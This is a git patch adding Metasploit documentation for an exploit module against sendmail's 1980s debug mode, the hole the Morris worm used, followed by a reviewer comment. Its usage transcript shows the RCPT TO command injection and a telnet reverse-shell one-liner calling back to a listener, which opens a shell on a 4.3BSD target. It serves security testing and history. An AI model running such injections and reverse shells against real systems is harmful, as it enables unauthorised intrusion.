From 8a6075c882a838c7893fec8bac6d15f91f01a516 Mon Sep 17 00:00:00 2001 From: William Vu Date: Sat, 20 Oct 2018 14:10:17 -0500 Subject: [PATCH] Add module doc --- .../unix/smtp/morris_sendmail_debug.md | 101 ++++++++++++++++++ 1 file changed, 101 insertions(+) create mode 100644 documentation/modules/exploit/unix/smtp/morris_sendmail_debug.md diff --git a/documentation/modules/exploit/unix/smtp/morris_sendmail_debug.md b/documentation/modules/exploit/unix/smtp/morris_sendmail_debug.md new file mode 100644 index 0000000000..faf88ee1d1 --- /dev/null +++ b/documentation/modules/exploit/unix/smtp/morris_sendmail_debug.md 
@@ -0,0 +1,101 @@ +## Intro + +This module exploits `sendmail`'s well-known historical debug mode to +escape to a shell and execute commands in the SMTP `RCPT TO` command. + +This vulnerability was exploited by the Morris worm in 1988-11-02. +Cliff Stoll reports on the worm in the epilogue of *The Cuckoo's Egg*. + +## Setup + +A Docker environment for 4.3BSD on VAX is available at +. + +For manual setup, please follow the Computer History Wiki's +[guide](http://gunkies.org/wiki/Installing_4.3_BSD_on_SIMH) or Allen +Garvin's [guide](http://plover.net/~agarvin/4.3bsd-on-simh.html) if +you're using [Quasijarus](http://gunkies.org/wiki/4.3_BSD_Quasijarus). + +## Targets + +``` +Id Name +-- ---- +0 @(#)version.c 5.51 (Berkeley) 5/2/86 +``` + +## Options + +**RPORT** + +Set this to the target port. The default is 25 for `sendmail`, but the +port may be forwarded when NAT (SLiRP) is used in SIMH. + +**PAYLOAD** + +Set this to a Unix command payload. Currently only `cmd/unix/reverse` +and `cmd/unix/generic` are supported. 
+ +## Usage + +``` +msf5 exploit(unix/smtp/morris_sendmail_debug) > options + +Module options (exploit/unix/smtp/morris_sendmail_debug): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + RHOSTS 127.0.0.1 yes The target address range or CIDR identifier + RPORT 25 yes The target port (TCP) + + +Payload options (cmd/unix/reverse): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + LHOST 192.168.1.5 yes The listen address (an interface may be specified) + LPORT 4444 yes The listen port + + +Exploit target: + + Id Name + -- ---- + 0 @(#)version.c 5.51 (Berkeley) 5/2/86 + + +msf5 exploit(unix/smtp/morris_sendmail_debug) > run + +[*] Started reverse TCP double handler on 192.168.1.5:4444 +[*] 127.0.0.1:25 - Connecting to sendmail +[*] 127.0.0.1:25 - Enabling debug mode and sending exploit +[*] 127.0.0.1:25 - Sending: DEBUG +[*] 127.0.0.1:25 - Sending: MAIL FROM: +[*] 127.0.0.1:25 - Sending: RCPT TO:<"| sed '1,/^$/d' | sh; exit 0"> +[*] 127.0.0.1:25 - Sending: DATA +[*] 127.0.0.1:25 - Sending: PATH=/bin:/usr/bin:/usr/ucb:/etc +[*] 127.0.0.1:25 - Sending: export PATH +[*] 127.0.0.1:25 - Sending: sh -c '(sleep 4197|telnet 192.168.1.5 4444|while : ; do sh && break; done 2>&1|telnet 192.168.1.5 4444 >/dev/null 2>&1 &)' +[*] 127.0.0.1:25 - Sending: . +[*] 127.0.0.1:25 - Sending: QUIT +[*] Accepted the first client connection... +[*] Accepted the second client connection... +[*] Command: echo zqhqKJD7trW0E0Lp; +[*] Writing to socket A +[*] Writing to socket B +[*] Reading from sockets... +[*] Reading from socket B +[*] B: "zqhqKJD7trW0E0Lp\r\n" +[*] Matching... +[*] A is input... +[*] Command shell session 1 opened (192.168.1.5:4444 -> 192.168.1.5:64337) at 2018-10-20 14:08:03 -0500 +[!] 127.0.0.1:25 - Do NOT type `exit', or else you may lose further shells! +[!] 
127.0.0.1:25 - Hit ^C to abort the session instead, please and thank you + +whoami +daemon +cat /etc/motd +4.3 BSD UNIX #1: Fri Jun 6 19:55:29 PDT 1986 + +Would you like to play a game? +```
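Review bot: the Setup paragraph's Docker environment link is empty ("A Docker environment for 4.3BSD on VAX is available at ."), so the sentence points nowhere; add the repository URL or drop the sentence. Two smaller points in the same hunk: "exploited by the Morris worm in 1988-11-02" should read "on 1988-11-02" since a full date is given, and the Usage caveat "Do NOT type `exit', or else you may lose further shells!" would be clearer with a one-line explanation that the payload's `while : ; do sh && break; done` loop terminates once the inner shell exits cleanly, which is why aborting the session with ^C is the recommended way out.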